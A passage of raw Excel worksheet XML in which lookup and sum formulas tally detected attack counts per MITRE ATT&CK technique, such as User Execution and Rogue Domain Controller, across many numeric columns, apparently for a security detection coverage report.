      <c r="AG37" s="322" t="str">
        <f t="shared" si="4"/>
        <v>4 (11)</v>
      </c>
      <c r="AH37" s="392">
        <v>4</v>
      </c>
      <c r="AI37" s="16">
        <v>1</v>
      </c>
      <c r="AJ37" s="394">
        <v>2</v>
      </c>
      <c r="AK37" s="392">
        <v>18</v>
      </c>
      <c r="AL37" s="392">
        <v>6</v>
      </c>
      <c r="AM37" s="322" t="str">
        <f t="shared" si="5"/>
        <v>6 (18)</v>
      </c>
      <c r="AN37" s="392">
        <v>6</v>
      </c>
      <c r="AO37" s="16">
        <v>1</v>
      </c>
      <c r="AP37" s="394">
        <v>2</v>
      </c>
      <c r="AQ37" s="292">
        <v>0</v>
      </c>
      <c r="AR37" s="322">
        <v>0</v>
      </c>
      <c r="AS37" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT37" s="12">
        <v>0</v>
      </c>
      <c r="AU37" s="13">
        <v>0</v>
      </c>
      <c r="AV37" s="394">
        <v>0</v>
      </c>
      <c r="AW37" s="392">
        <v>1</v>
      </c>
      <c r="AX37" s="392">
        <v>1</v>
      </c>
      <c r="AY37" s="322" t="str">
        <f t="shared" si="7"/>
        <v>1 (1)</v>
      </c>
      <c r="AZ37" s="4">
        <v>1</v>
      </c>
      <c r="BA37" s="16">
        <v>1</v>
      </c>
      <c r="BB37" s="394">
        <v>1</v>
      </c>
      <c r="BC37" s="292">
        <v>7</v>
      </c>
      <c r="BD37" s="322">
        <v>2</v>
      </c>
      <c r="BE37" s="322" t="str">
        <f t="shared" si="8"/>
        <v>2 (7)</v>
      </c>
      <c r="BF37" s="12">
        <v>2</v>
      </c>
      <c r="BG37" s="13">
        <v>1</v>
      </c>
      <c r="BH37" s="394">
        <v>1</v>
      </c>
      <c r="BI37" s="292">
        <v>0</v>
      </c>
      <c r="BJ37" s="322">
        <v>0</v>
      </c>
      <c r="BK37" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL37" s="12">
        <v>0</v>
      </c>
      <c r="BM37" s="13">
        <v>0</v>
      </c>
      <c r="BN37" s="394">
        <v>0</v>
      </c>
      <c r="BO37" s="292">
        <v>3</v>
      </c>
      <c r="BP37" s="322">
        <v>3</v>
      </c>
      <c r="BQ37" s="322" t="str">
        <f t="shared" si="10"/>
        <v>3 (3)</v>
      </c>
      <c r="BR37" s="12">
        <v>0</v>
      </c>
      <c r="BS37" s="12">
        <v>3</v>
      </c>
      <c r="BT37" s="13">
        <v>1</v>
      </c>
      <c r="BU37" s="394">
        <v>3</v>
      </c>
      <c r="BV37" s="292">
        <v>0</v>
      </c>
      <c r="BW37" s="322">
        <v>0</v>
      </c>
      <c r="BX37" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY37" s="12">
        <v>0</v>
      </c>
      <c r="BZ37" s="13">
        <v>0</v>
      </c>
      <c r="CA37" s="394">
        <v>0</v>
      </c>
      <c r="CB37" s="292">
        <v>1</v>
      </c>
      <c r="CC37" s="322">
        <v>1</v>
      </c>
      <c r="CD37" s="322" t="str">
        <f t="shared" si="12"/>
        <v>1 (1)</v>
      </c>
      <c r="CE37" s="12">
        <v>0</v>
      </c>
      <c r="CF37" s="12">
        <v>1</v>
      </c>
      <c r="CG37" s="13">
        <v>1</v>
      </c>
      <c r="CH37" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="38" spans="1:86" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A38" s="4">
        <f t="shared" si="13"/>
        <v>36</v>
      </c>
      <c r="B38" s="4" t="str">
        <f>IFERROR(VLOOKUP(A38,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1203</v>
      </c>
      <c r="C38" s="493" t="str">
        <f>IFERROR(VLOOKUP(B38,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Exploitation for Client Execution</v>
      </c>
      <c r="D38" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B38)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E38" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>116</v>
      </c>
      <c r="F38" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (116)</v>
      </c>
      <c r="G38" s="292">
        <v>1</v>
      </c>
      <c r="H38" s="322">
        <v>1</v>
      </c>
      <c r="I38" s="322" t="str">
        <f t="shared" si="0"/>
        <v>1 (1)</v>
      </c>
      <c r="J38" s="12">
        <v>1</v>
      </c>
      <c r="K38" s="13">
        <v>1</v>
      </c>
      <c r="L38" s="394">
        <v>1</v>
      </c>
      <c r="M38" s="322">
        <v>5505</v>
      </c>
      <c r="N38" s="322">
        <v>112</v>
      </c>
      <c r="O38" s="322" t="str">
        <f t="shared" si="1"/>
        <v>112 (5505)</v>
      </c>
      <c r="P38" s="12">
        <v>1</v>
      </c>
      <c r="Q38" s="13">
        <v>1</v>
      </c>
      <c r="R38" s="394">
        <v>112</v>
      </c>
      <c r="S38" s="292">
        <v>5506</v>
      </c>
      <c r="T38" s="322">
        <v>113</v>
      </c>
      <c r="U38" s="322" t="str">
        <f t="shared" si="2"/>
        <v>113 (5506)</v>
      </c>
      <c r="V38" s="12">
        <v>2</v>
      </c>
      <c r="W38" s="13">
        <v>1</v>
      </c>
      <c r="X38" s="394">
        <v>112</v>
      </c>
      <c r="Y38" s="392">
        <v>16570</v>
      </c>
      <c r="Z38" s="392">
        <v>233</v>
      </c>
      <c r="AA38" s="322" t="str">
        <f t="shared" si="3"/>
        <v>233 (16570)</v>
      </c>
      <c r="AB38" s="392">
        <v>5</v>
      </c>
      <c r="AC38" s="16">
        <v>1</v>
      </c>
      <c r="AD38" s="394">
        <v>116</v>
      </c>
      <c r="AE38" s="392">
        <v>5528</v>
      </c>
      <c r="AF38" s="392">
        <v>135</v>
      </c>
      <c r="AG38" s="322" t="str">
        <f t="shared" si="4"/>
        <v>135 (5528)</v>
      </c>
      <c r="AH38" s="392">
        <v>3</v>
      </c>
      <c r="AI38" s="16">
        <v>1</v>
      </c>
      <c r="AJ38" s="394">
        <v>112</v>
      </c>
      <c r="AK38" s="392">
        <v>22098</v>
      </c>
      <c r="AL38" s="392">
        <v>368</v>
      </c>
      <c r="AM38" s="322" t="str">
        <f t="shared" si="5"/>
        <v>368 (22098)</v>
      </c>
      <c r="AN38" s="392">
        <v>8</v>
      </c>
      <c r="AO38" s="16">
        <v>1</v>
      </c>
      <c r="AP38" s="394">
        <v>116</v>
      </c>
      <c r="AQ38" s="292">
        <v>0</v>
      </c>
      <c r="AR38" s="322">
        <v>0</v>
      </c>
      <c r="AS38" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT38" s="12">
        <v>0</v>
      </c>
      <c r="AU38" s="13">
        <v>0</v>
      </c>
      <c r="AV38" s="394">
        <v>0</v>
      </c>
      <c r="AW38" s="392">
        <v>0</v>
      </c>
      <c r="AX38" s="392">
        <v>0</v>
      </c>
      <c r="AY38" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ38" s="4">
        <v>0</v>
      </c>
      <c r="BA38" s="16">
        <v>0</v>
      </c>
      <c r="BB38" s="394">
        <v>0</v>
      </c>
      <c r="BC38" s="292">
        <v>5506</v>
      </c>
      <c r="BD38" s="322">
        <v>113</v>
      </c>
      <c r="BE38" s="322" t="str">
        <f t="shared" si="8"/>
        <v>113 (5506)</v>
      </c>
      <c r="BF38" s="12">
        <v>2</v>
      </c>
      <c r="BG38" s="13">
        <v>1</v>
      </c>
      <c r="BH38" s="394">
        <v>112</v>
      </c>
      <c r="BI38" s="292">
        <v>224</v>
      </c>
      <c r="BJ38" s="322">
        <v>112</v>
      </c>
      <c r="BK38" s="322" t="str">
        <f t="shared" si="9"/>
        <v>112 (224)</v>
      </c>
      <c r="BL38" s="12">
        <v>1</v>
      </c>
      <c r="BM38" s="13">
        <v>1</v>
      </c>
      <c r="BN38" s="394">
        <v>112</v>
      </c>
      <c r="BO38" s="292">
        <v>454</v>
      </c>
      <c r="BP38" s="322">
        <v>342</v>
      </c>
      <c r="BQ38" s="322" t="str">
        <f t="shared" si="10"/>
        <v>342 (454)</v>
      </c>
      <c r="BR38" s="12">
        <v>1</v>
      </c>
      <c r="BS38" s="12">
        <v>2</v>
      </c>
      <c r="BT38" s="13">
        <v>1</v>
      </c>
      <c r="BU38" s="394">
        <v>115</v>
      </c>
      <c r="BV38" s="292">
        <v>56</v>
      </c>
      <c r="BW38" s="322">
        <v>56</v>
      </c>
      <c r="BX38" s="322" t="str">
        <f t="shared" si="11"/>
        <v>56 (56)</v>
      </c>
      <c r="BY38" s="12">
        <v>2</v>
      </c>
      <c r="BZ38" s="13">
        <v>1</v>
      </c>
      <c r="CA38" s="394">
        <v>28</v>
      </c>
      <c r="CB38" s="292">
        <v>213</v>
      </c>
      <c r="CC38" s="322">
        <v>112</v>
      </c>
      <c r="CD38" s="322" t="str">
        <f t="shared" si="12"/>
        <v>112 (213)</v>
      </c>
      <c r="CE38" s="12">
        <v>0</v>
      </c>
      <c r="CF38" s="12">
        <v>1</v>
      </c>
      <c r="CG38" s="13">
        <v>1</v>
      </c>
      <c r="CH38" s="394">
        <v>112</v>
      </c>
    </row>
    <row r="39" spans="1:86" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A39" s="4">
        <f t="shared" si="13"/>
        <v>37</v>
      </c>
      <c r="B39" s="4" t="str">
        <f>IFERROR(VLOOKUP(A39,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1204</v>
      </c>
      <c r="C39" s="493" t="str">
        <f>IFERROR(VLOOKUP(B39,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>User Execution</v>
      </c>
      <c r="D39" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B39)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E39" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>1</v>
      </c>
      <c r="F39" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (1)</v>
      </c>
      <c r="G39" s="292">
        <v>0</v>
      </c>
      <c r="H39" s="322">
        <v>0</v>
      </c>
      <c r="I39" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J39" s="12">
        <v>0</v>
      </c>
      <c r="K39" s="13">
        <v>0</v>
      </c>
      <c r="L39" s="394">
        <v>0</v>
      </c>
      <c r="M39" s="322">
        <v>0</v>
      </c>
      <c r="N39" s="322">
        <v>0</v>
      </c>
      <c r="O39" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P39" s="12">
        <v>0</v>
      </c>
      <c r="Q39" s="13">
        <v>0</v>
      </c>
      <c r="R39" s="394">
        <v>0</v>
      </c>
      <c r="S39" s="292">
        <v>0</v>
      </c>
      <c r="T39" s="322">
        <v>0</v>
      </c>
      <c r="U39" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="V39" s="12">
        <v>0</v>
      </c>
      <c r="W39" s="13">
        <v>0</v>
      </c>
      <c r="X39" s="394">
        <v>0</v>
      </c>
      <c r="Y39" s="392">
        <v>0</v>
      </c>
      <c r="Z39" s="392">
        <v>0</v>
      </c>
      <c r="AA39" s="322" t="str">
        <f t="shared" si="3"/>
        <v>0 (0)</v>
      </c>
      <c r="AB39" s="392">
        <v>0</v>
      </c>
      <c r="AC39" s="16">
        <v>0</v>
      </c>
      <c r="AD39" s="394">
        <v>0</v>
      </c>
      <c r="AE39" s="392">
        <v>4</v>
      </c>
      <c r="AF39" s="392">
        <v>2</v>
      </c>
      <c r="AG39" s="322" t="str">
        <f t="shared" si="4"/>
        <v>2 (4)</v>
      </c>
      <c r="AH39" s="392">
        <v>2</v>
      </c>
      <c r="AI39" s="16">
        <v>1</v>
      </c>
      <c r="AJ39" s="394">
        <v>1</v>
      </c>
      <c r="AK39" s="392">
        <v>4</v>
      </c>
      <c r="AL39" s="392">
        <v>2</v>
      </c>
      <c r="AM39" s="322" t="str">
        <f t="shared" si="5"/>
        <v>2 (4)</v>
      </c>
      <c r="AN39" s="392">
        <v>2</v>
      </c>
      <c r="AO39" s="16">
        <v>1</v>
      </c>
      <c r="AP39" s="394">
        <v>1</v>
      </c>
      <c r="AQ39" s="292">
        <v>0</v>
      </c>
      <c r="AR39" s="322">
        <v>0</v>
      </c>
      <c r="AS39" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT39" s="12">
        <v>0</v>
      </c>
      <c r="AU39" s="13">
        <v>0</v>
      </c>
      <c r="AV39" s="394">
        <v>0</v>
      </c>
      <c r="AW39" s="392">
        <v>0</v>
      </c>
      <c r="AX39" s="392">
        <v>0</v>
      </c>
      <c r="AY39" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ39" s="4">
        <v>0</v>
      </c>
      <c r="BA39" s="16">
        <v>0</v>
      </c>
      <c r="BB39" s="394">
        <v>0</v>
      </c>
      <c r="BC39" s="292">
        <v>0</v>
      </c>
      <c r="BD39" s="322">
        <v>0</v>
      </c>
      <c r="BE39" s="322" t="str">
        <f t="shared" si="8"/>
        <v>0 (0)</v>
      </c>
      <c r="BF39" s="12">
        <v>0</v>
      </c>
      <c r="BG39" s="13">
        <v>0</v>
      </c>
      <c r="BH39" s="394">
        <v>0</v>
      </c>
      <c r="BI39" s="292">
        <v>0</v>
      </c>
      <c r="BJ39" s="322">
        <v>0</v>
      </c>
      <c r="BK39" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL39" s="12">
        <v>0</v>
      </c>
      <c r="BM39" s="13">
        <v>0</v>
      </c>
      <c r="BN39" s="394">
        <v>0</v>
      </c>
      <c r="BO39" s="292">
        <v>0</v>
      </c>
      <c r="BP39" s="322">
        <v>0</v>
      </c>
      <c r="BQ39" s="322" t="str">
        <f t="shared" si="10"/>
        <v>0 (0)</v>
      </c>
      <c r="BR39" s="12">
        <v>0</v>
      </c>
      <c r="BS39" s="12">
        <v>0</v>
      </c>
      <c r="BT39" s="13">
        <v>0</v>
      </c>
      <c r="BU39" s="394">
        <v>0</v>
      </c>
      <c r="BV39" s="292">
        <v>0</v>
      </c>
      <c r="BW39" s="322">
        <v>0</v>
      </c>
      <c r="BX39" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY39" s="12">
        <v>0</v>
      </c>
      <c r="BZ39" s="13">
        <v>0</v>
      </c>
      <c r="CA39" s="394">
        <v>0</v>
      </c>
      <c r="CB39" s="292">
        <v>0</v>
      </c>
      <c r="CC39" s="322">
        <v>0</v>
      </c>
      <c r="CD39" s="322" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE39" s="12">
        <v>0</v>
      </c>
      <c r="CF39" s="12">
        <v>0</v>
      </c>
      <c r="CG39" s="13">
        <v>0</v>
      </c>
      <c r="CH39" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="40" spans="1:86" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A40" s="4">
        <f t="shared" si="13"/>
        <v>38</v>
      </c>
      <c r="B40" s="4" t="str">
        <f>IFERROR(VLOOKUP(A40,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1205</v>
      </c>
      <c r="C40" s="493" t="str">
        <f>IFERROR(VLOOKUP(B40,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Traffic Signaling</v>
      </c>
      <c r="D40" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B40)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E40" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>5</v>
      </c>
      <c r="F40" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (5)</v>
      </c>
      <c r="G40" s="292">
        <v>2</v>
      </c>
      <c r="H40" s="322">
        <v>1</v>
      </c>
      <c r="I40" s="322" t="str">
        <f t="shared" si="0"/>
        <v>1 (2)</v>
      </c>
      <c r="J40" s="12">
        <v>1</v>
      </c>
      <c r="K40" s="13">
        <v>1</v>
      </c>
      <c r="L40" s="394">
        <v>1</v>
      </c>
      <c r="M40" s="322">
        <v>0</v>
      </c>
      <c r="N40" s="322">
        <v>0</v>
      </c>
      <c r="O40" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P40" s="12">
        <v>0</v>
      </c>
      <c r="Q40" s="13">
        <v>0</v>
      </c>
      <c r="R40" s="394">
        <v>0</v>
      </c>
      <c r="S40" s="292">
        <v>2</v>
      </c>
      <c r="T40" s="322">
        <v>1</v>
      </c>
      <c r="U40" s="322" t="str">
        <f t="shared" si="2"/>
        <v>1 (2)</v>
      </c>
      <c r="V40" s="12">
        <v>1</v>
      </c>
      <c r="W40" s="13">
        <v>1</v>
      </c>
      <c r="X40" s="394">
        <v>1</v>
      </c>
      <c r="Y40" s="392">
        <v>3</v>
      </c>
      <c r="Z40" s="392">
        <v>2</v>
      </c>
      <c r="AA40" s="322" t="str">
        <f t="shared" si="3"/>
        <v>2 (3)</v>
      </c>
      <c r="AB40" s="392">
        <v>2</v>
      </c>
      <c r="AC40" s="16">
        <v>1</v>
      </c>
      <c r="AD40" s="394">
        <v>1</v>
      </c>
      <c r="AE40" s="392">
        <v>4</v>
      </c>
      <c r="AF40" s="392">
        <v>4</v>
      </c>
      <c r="AG40" s="322" t="str">
        <f t="shared" si="4"/>
        <v>4 (4)</v>
      </c>
      <c r="AH40" s="392">
        <v>2</v>
      </c>
      <c r="AI40" s="16">
        <v>1</v>
      </c>
      <c r="AJ40" s="394">
        <v>2</v>
      </c>
      <c r="AK40" s="392">
        <v>7</v>
      </c>
      <c r="AL40" s="392">
        <v>6</v>
      </c>
      <c r="AM40" s="322" t="str">
        <f t="shared" si="5"/>
        <v>6 (7)</v>
      </c>
      <c r="AN40" s="392">
        <v>4</v>
      </c>
      <c r="AO40" s="16">
        <v>1</v>
      </c>
      <c r="AP40" s="394">
        <v>2</v>
      </c>
      <c r="AQ40" s="292">
        <v>0</v>
      </c>
      <c r="AR40" s="322">
        <v>0</v>
      </c>
      <c r="AS40" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT40" s="12">
        <v>0</v>
      </c>
      <c r="AU40" s="13">
        <v>0</v>
      </c>
      <c r="AV40" s="394">
        <v>0</v>
      </c>
      <c r="AW40" s="392">
        <v>1</v>
      </c>
      <c r="AX40" s="392">
        <v>1</v>
      </c>
      <c r="AY40" s="322" t="str">
        <f t="shared" si="7"/>
        <v>1 (1)</v>
      </c>
      <c r="AZ40" s="4">
        <v>1</v>
      </c>
      <c r="BA40" s="16">
        <v>1</v>
      </c>
      <c r="BB40" s="394">
        <v>1</v>
      </c>
      <c r="BC40" s="292">
        <v>3</v>
      </c>
      <c r="BD40" s="322">
        <v>2</v>
      </c>
      <c r="BE40" s="322" t="str">
        <f t="shared" si="8"/>
        <v>2 (3)</v>
      </c>
      <c r="BF40" s="12">
        <v>2</v>
      </c>
      <c r="BG40" s="13">
        <v>1</v>
      </c>
      <c r="BH40" s="394">
        <v>1</v>
      </c>
      <c r="BI40" s="292">
        <v>1</v>
      </c>
      <c r="BJ40" s="322">
        <v>1</v>
      </c>
      <c r="BK40" s="322" t="str">
        <f t="shared" si="9"/>
        <v>1 (1)</v>
      </c>
      <c r="BL40" s="12">
        <v>1</v>
      </c>
      <c r="BM40" s="13">
        <v>1</v>
      </c>
      <c r="BN40" s="394">
        <v>1</v>
      </c>
      <c r="BO40" s="292">
        <v>2</v>
      </c>
      <c r="BP40" s="322">
        <v>2</v>
      </c>
      <c r="BQ40" s="322" t="str">
        <f t="shared" si="10"/>
        <v>2 (2)</v>
      </c>
      <c r="BR40" s="12">
        <v>1</v>
      </c>
      <c r="BS40" s="12">
        <v>1</v>
      </c>
      <c r="BT40" s="13">
        <v>1</v>
      </c>
      <c r="BU40" s="394">
        <v>1</v>
      </c>
      <c r="BV40" s="292">
        <v>0</v>
      </c>
      <c r="BW40" s="322">
        <v>0</v>
      </c>
      <c r="BX40" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY40" s="12">
        <v>0</v>
      </c>
      <c r="BZ40" s="13">
        <v>0</v>
      </c>
      <c r="CA40" s="394">
        <v>0</v>
      </c>
      <c r="CB40" s="292">
        <v>1</v>
      </c>
      <c r="CC40" s="322">
        <v>1</v>
      </c>
      <c r="CD40" s="322" t="str">
        <f t="shared" si="12"/>
        <v>1 (1)</v>
      </c>
      <c r="CE40" s="12">
        <v>0</v>
      </c>
      <c r="CF40" s="12">
        <v>1</v>
      </c>
      <c r="CG40" s="13">
        <v>1</v>
      </c>
      <c r="CH40" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="41" spans="1:86" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A41" s="4">
        <f t="shared" si="13"/>
        <v>39</v>
      </c>
      <c r="B41" s="4" t="str">
        <f>IFERROR(VLOOKUP(A41,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1207</v>
      </c>
      <c r="C41" s="493" t="str">
        <f>IFERROR(VLOOKUP(B41,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Rogue Domain Controller</v>
      </c>
      <c r="D41" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B41)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E41" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>88</v>
      </c>
      <c r="F41" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (88)</v>
      </c>
      <c r="G41" s="292">
        <v>14</v>
      </c>
      <c r="H41" s="322">
        <v>10</v>
      </c>
      <c r="I41" s="322" t="str">
        <f t="shared" si="0"/>
        <v>10 (14)</v>
      </c>
      <c r="J41" s="12">
        <v>1</v>
      </c>
      <c r="K41" s="13">
        <v>1</v>
      </c>
      <c r="L41" s="394">
        <v>10</v>
      </c>
      <c r="M41" s="322">
        <v>0</v>
      </c>
      <c r="N41" s="322">
        <v>0</v>
      </c>
      <c r="O41" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P41" s="12">
        <v>0</v>
      </c>
      <c r="Q41" s="13">
        <v>0</v>
      </c>
      <c r="R41" s="394">
        <v>0</v>
      </c>
      <c r="S41" s="292">
        <v>14</v>
      </c>
      <c r="T41" s="322">
        <v>10</v>
      </c>
      <c r="U41" s="322" t="str">
        <f t="shared" si="2"/>
        <v>10 (14)</v>
      </c>
      <c r="V41" s="12">
        <v>1</v>
      </c>
      <c r="W41" s="13">
        <v>1</v>
      </c>
      <c r="X41" s="394">
        <v>10</v>
      </c>
      <c r="Y41" s="392">
        <v>46</v>
      </c>
      <c r="Z41" s="392">
        <v>32</v>
      </c>
      <c r="AA41" s="322" t="str">
        <f t="shared" si="3"/>
        <v>32 (46)</v>
      </c>
      <c r="AB41" s="392">
        <v>3</v>
      </c>
      <c r="AC41" s="16">
        <v>1</v>
      </c>
      <c r="AD41" s="394">
        <v>24</v>
      </c>
      <c r="AE41" s="392">
        <v>4</v>
      </c>
      <c r="AF41" s="392">
        <v>2</v>
      </c>
      <c r="AG41" s="322" t="str">
        <f t="shared" si="4"/>
        <v>2 (4)</v>
      </c>
      <c r="AH41" s="392">
        <v>2</v>
      </c>
      <c r="AI41" s="16">
        <v>1</v>
      </c>
      <c r="AJ41" s="394">
        <v>1</v>
      </c>
      <c r="AK41" s="392">
        <v>50</v>
      </c>
      <c r="AL41" s="392">
        <v>34</v>
      </c>
      <c r="AM41" s="322" t="str">
        <f t="shared" si="5"/>
        <v>34 (50)</v>
      </c>
      <c r="AN41" s="392">
        <v>5</v>
      </c>
      <c r="AO41" s="16">
        <v>1</v>
      </c>
      <c r="AP41" s="394">
        <v>25</v>
      </c>
      <c r="AQ41" s="292">
        <v>0</v>
      </c>
      <c r="AR41" s="322">
        <v>0</v>
      </c>
      <c r="AS41" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT41" s="12">
        <v>0</v>
      </c>
      <c r="AU41" s="13">
        <v>0</v>
      </c>
      <c r="AV41" s="394">
        <v>0</v>
      </c>
      <c r="AW41" s="392">
        <v>0</v>
      </c>
      <c r="AX41" s="392">
        <v>0</v>
      </c>
      <c r="AY41" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ41" s="4">
        <v>0</v>
      </c>
      <c r="BA41" s="16">
        <v>0</v>
      </c>
      <c r="BB41" s="394">
        <v>0</v>
      </c>
      <c r="BC41" s="292">
        <v>14</v>
      </c>
      <c r="BD41" s="322">
        <v>10</v>
      </c>
      <c r="BE41" s="322" t="str">
        <f t="shared" si="8"/>
        <v>10 (14)</v>
      </c>
      <c r="BF41" s="12">
        <v>1</v>
      </c>
      <c r="BG41" s="13">
        <v>1</v>
      </c>
      <c r="BH41" s="394">
        <v>10</v>
      </c>
      <c r="BI41" s="292">
        <v>0</v>
      </c>
      <c r="BJ41" s="322">
        <v>0</v>
      </c>
      <c r="BK41" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL41" s="12">
        <v>0</v>
      </c>
      <c r="BM41" s="13">
        <v>0</v>
      </c>
      <c r="BN41" s="394">
        <v>0</v>
      </c>
      <c r="BO41" s="292">
        <v>75</v>
      </c>
      <c r="BP41" s="322">
        <v>75</v>
      </c>
      <c r="BQ41" s="322" t="str">
        <f t="shared" si="10"/>
        <v>75 (75)</v>
      </c>
      <c r="BR41" s="12">
        <v>0</v>
      </c>
      <c r="BS41" s="12">
        <v>8</v>
      </c>
      <c r="BT41" s="13">
        <v>1</v>
      </c>
      <c r="BU41" s="394">
        <v>73</v>
      </c>
      <c r="BV41" s="292">
        <v>0</v>
      </c>
      <c r="BW41" s="322">
        <v>0</v>
      </c>
      <c r="BX41" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY41" s="12">
        <v>0</v>
      </c>
      <c r="BZ41" s="13">
        <v>0</v>
      </c>
      <c r="CA41" s="394">
        <v>0</v>
      </c>
      <c r="CB41" s="292">
        <v>0</v>
      </c>
      <c r="CC41" s="322">
        <v>0</v>
      </c>
      <c r="CD41" s="322" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE41" s="12">
        <v>0</v>
      </c>
      <c r="CF41" s="12">
        <v>0</v>
      </c>
      <c r="CG41" s="13">
        <v>0</v>
      </c>
      <c r="CH41" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="42" spans="1:86" ht="15" customHeight="1">
      <c r="A42" s="4">
        <f t="shared" si="13"/>
        <v>40</v>
      </c>
      <c r="B42" s="4" t="str">
        <f>IFERROR(VLOOKUP(A42,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1210</v>
      </c>
      <c r="C42" s="493" t="str">
        <f>IFERROR(VLOOKUP(B42,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Exploitation of Remote Services</v>
      </c>
      <c r="D42" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B42)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>3</v>
      </c>
      <c r="E42" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>287</v>
      </c>
      <c r="F42" s="579" t="str">
        <f t="shared" si="14"/>
        <v>3 (287)</v>
      </c>
      <c r="G42" s="292">
        <v>24</v>
      </c>
      <c r="H42" s="322">
        <v>6</v>
      </c>
      <c r="I42" s="322" t="str">
        <f t="shared" si="0"/>
        <v>6 (24)</v>
      </c>
      <c r="J42" s="12">
        <v>3</v>
      </c>
      <c r="K42" s="13">
        <v>0.66666666666666663</v>
      </c>
      <c r="L42" s="394">
        <v>4</v>
      </c>
      <c r="M42" s="322">
        <v>6</v>
      </c>
      <c r="N42" s="322">
        <v>6</v>
      </c>
      <c r="O42" s="322" t="str">
        <f t="shared" si="1"/>
        <v>6 (6)</v>
      </c>
      <c r="P42" s="12">
        <v>6</v>
      </c>
      <c r="Q42" s="13">
        <v>0.33333333333333331</v>
      </c>
